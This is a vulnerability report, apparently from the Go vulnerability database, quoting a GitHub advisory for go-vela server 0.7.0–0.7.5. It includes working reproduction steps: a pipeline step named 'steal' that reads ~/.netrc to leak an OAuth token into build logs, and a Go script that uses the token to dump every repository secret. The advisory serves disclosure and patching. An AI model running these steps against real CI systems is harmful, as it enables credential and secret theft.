See doc/triage.md for instructions on how to triage this report.
modules:
  - module: github.com/go-vela/server/api
    versions:
      - introduced: 0.7.0
        fixed: 0.7.5
    packages:
      - package: github.com/go-vela/server/api
  - module: github.com/go-vela/server/api
    versions:
      - introduced: 0.7.0
        fixed: 0.7.5
    packages:
      - package: github.com/go-vela/server
description: |-
  ### Impact
  _What kind of vulnerability is it? Who is impacted?_

  The additional auth mechanism added within https://github.com/go-vela/server/pull/246 enables some malicious user to obtain secrets utilizing the injected credentials within the `~/.netrc` file.

  Steps to reproduce

  1. Create Vela server
  2. Log in to Vela UI
  3. Promote yourself to Vela administrator
     - `UPDATE users SET admin = 't' WHERE name = <username>`
  4. Activate repository within Vela
  5. Add `.vela.yml` to the repository with the following content

     ```yaml
     version: "1"

     steps:
       - name: steal
         image: alpine
         commands:
           - cat ~/.netrc
     ```

  6. Look at build logs to find the following content

     ```
     $ cat ~/.netrc
     machine <GITHUB URL>
     login x-oauth-basic
     password <token>
     ```

  7. Copy the password to be utilized in some later step
  8. Add secret(s) to activated repo
  9. Copy the following script into `main.go`

     ```golang
     package main

     import (
     	"fmt"
     	"github.com/go-vela/sdk-go/vela"
     	"os"
     )

     func main() {
     	// create client to connect to vela
     	client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil)
     	if err != nil {
     		panic(err)
     	}

     	// add PAT to request
     	client.Authentication.SetPersonalAccessTokenAuth(os.Getenv("VELA_TOKEN"))

     	secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})
     	if err != nil {
     		panic(err)
     	}

     	for _, secret := range *secrets {
     		fmt.Println(*secret.Name)
     		fmt.Println(*secret.Value)
     	}
     }
     ```

  10. Run the `main.go` with environment specific settings
      - `VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go`

  The previously posted script could be updated to utilize any API endpoint(s) the activated user has access against.

  ### Patches
  _Has the problem been patched? What versions should users upgrade to?_

  * Upgrade to `v0.7.5` or later

  ### Workarounds
  _Is there a way for users to fix or remediate the vulnerability without upgrading?_

  * No known workarounds

  ### References
  _Are there any links users can visit to find out more?_

  * https://github.com/go-vela/server/pull/246
  * https://docs.github.com/en/enterprise-server@3.0/rest/reference/apps#check-a-token

  ### For more information
  If you have any questions or comments about this advisory

  * Email us at [vela@target.com](mailto:vela@target.com)
cves:
  - CVE-2021-21432
ghsas:
  - GHSA-8j3f-mhq8-gmh4
In GitHub Security Advisory GHSA-8j3f-mhq8-gmh4, there is a vulnerability in the following Go packages or modules:
Cross references: